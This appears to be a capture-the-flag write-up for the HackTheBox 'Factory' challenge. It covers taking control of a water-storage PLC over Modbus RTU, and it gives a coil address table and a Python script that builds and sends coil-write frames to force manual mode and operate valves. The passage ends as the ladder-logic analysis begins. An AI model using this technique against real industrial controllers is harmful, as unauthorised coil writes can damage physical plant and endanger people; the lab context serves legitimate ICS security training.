hardware / free / medium

Factory

HackTheBox

Techniques: plc_coil_write, ladder_logic_analysis, modbus_rtu_command_injection, ics_mode_switching


Description

Our infrastructure is under attack! The HMI interface went offline and we lost control of some critical PLCs in our ICS system. Moments after the attack started we managed to identify the target but did not have time to respond. The water storage facility's high/low sensors are corrupted thus setting the PLC into a halt state. We need to regain control and empty the water tank before it overflows. Our field operative has set a remote connection directly with the serial network of the system.

Files

  • interface_setup.png — Network diagram showing the ICS architecture
  • PLC_Ladder_Logic.pdf — PLC ladder logic diagram for the water_storage_facility

Architecture

[Laptop-1 (Us)] --TCP--> [Laptop-2 (Gateway)] --Modbus RTU (Serial)--> [PLC-1 (Slave 82)]
  • PLC-1 (Target): Slave Address 82 (0x52), connected via serial Modbus RTU
  • Laptop-2: Gateway — converts received Modbus packets into valid packets (with CRC) and forwards into the real Modbus RTU network
  • Laptop-1 (Us/Host): Sends Modbus commands to Laptop-2 via TCP, which forwards them to the PLC

PLC-1 Coil Addresses

Address (decimal)   Hex      Coil
5                   0x0005   cutoff
12                  0x000C   in_valve
21                  0x0015   out_valve
26                  0x001A   cutoff_in
33                  0x0021   start
52                  0x0034   force_start_out
1336                0x0538   force_start_in
9947                0x26DB   manual_mode_control
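The architecture above means every command we send ends up as a Modbus RTU frame on the serial bus: slave address, function code, data, CRC-16. The following is an added example (my own code, not part of the original writeup or of the challenge files) that builds Write Single Coil (function 0x05) frames for slave 82 using the coil table above and validates the PLC's echo response. It assumes three things the page does not state: that the Laptop-2 gateway accepts a raw RTU frame over its TCP socket and forwards it (the gateway recomputes the CRC anyway, but computing it locally lets us verify the reply), that the decimal addresses in the table are the zero-based coil addresses that go into the PDU (if the PLC documentation counts coils from 1, subtract 1 first), and that the gateway host and port are placeholders to be filled in from interface_setup.png.

```python
"""Modbus RTU coil-write frames for PLC-1 (slave 82).

Added example for this writeup; not code from the challenge or HackTheBox.
Assumptions (not given on the page): the TCP gateway forwards raw RTU
frames, the table addresses are zero-based PDU coil addresses, and the
gateway host/port below are placeholders.
"""
import socket
import struct

SLAVE_ADDR = 0x52  # PLC-1, slave 82 decimal

# Coil map from the PLC-1 table (name -> decimal address). Zero-based
# addressing is an assumption; subtract 1 if the PLC counts from 1.
COILS = {
    "cutoff": 5,
    "in_valve": 12,
    "out_valve": 21,
    "cutoff_in": 26,
    "start": 33,
    "force_start_out": 52,
    "force_start_in": 1336,
    "manual_mode_control": 9947,
}

FC_WRITE_SINGLE_COIL = 0x05
COIL_ON, COIL_OFF = 0xFF00, 0x0000  # FC 05 encodes the coil state as a 16-bit word


def crc16_modbus(data: bytes) -> int:
    """CRC-16/MODBUS: reflected poly 0xA001 (0x8005), init 0xFFFF, no final XOR."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            if crc & 1:
                crc = (crc >> 1) ^ 0xA001
            else:
                crc >>= 1
    return crc


def build_write_coil(coil_name: str, on: bool, slave: int = SLAVE_ADDR) -> bytes:
    """FC 05 RTU frame: slave(1) fc(1) coil_addr(2, BE) value(2, BE) crc(2, LE)."""
    addr = COILS[coil_name]
    body = struct.pack(">BBHH", slave, FC_WRITE_SINGLE_COIL, addr, COIL_ON if on else COIL_OFF)
    return body + struct.pack("<H", crc16_modbus(body))


def check_response(request: bytes, response: bytes) -> bool:
    """True only for a valid echo of the FC 05 request.

    A wrong CRC means a corrupted or truncated serial frame; a function code
    with bit 0x80 set is a Modbus exception (e.g. illegal data address); a
    normal FC 05 reply echoes the request byte for byte.
    """
    if len(response) < 4:
        return False
    body, crc = response[:-2], struct.unpack("<H", response[-2:])[0]
    if crc16_modbus(body) != crc:
        return False
    if body[1] & 0x80:
        return False
    return response == request


def send_over_gateway(host: str, port: int, frame: bytes, timeout: float = 2.0) -> bytes:
    """Push one RTU frame through the Laptop-2 TCP gateway and read the reply.
    Raw-frame-over-TCP is an assumption about the gateway, not a documented format."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(frame)
        return sock.recv(256)


if __name__ == "__main__":
    # Offline demonstration: show the frames without touching the network.
    for name, state in (("manual_mode_control", True), ("out_valve", True), ("in_valve", False)):
        frame = build_write_coil(name, state)
        print(f"{name:<20} {'ON ' if state else 'OFF'} {frame.hex(' ')}")
    # To drive the PLC: reply = send_over_gateway("GATEWAY_HOST", 1234, frame)
    # and then check_response(frame, reply) before trusting the result.
```

The order in which coils are written (switching to manual mode before touching the valves, for instance) depends on the ladder logic analysed in the next section; the frame builder itself is mode-agnostic.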

Analysis

Ladder Logic

The PLC operates in two modes: auto_mode and manual_mode.

...
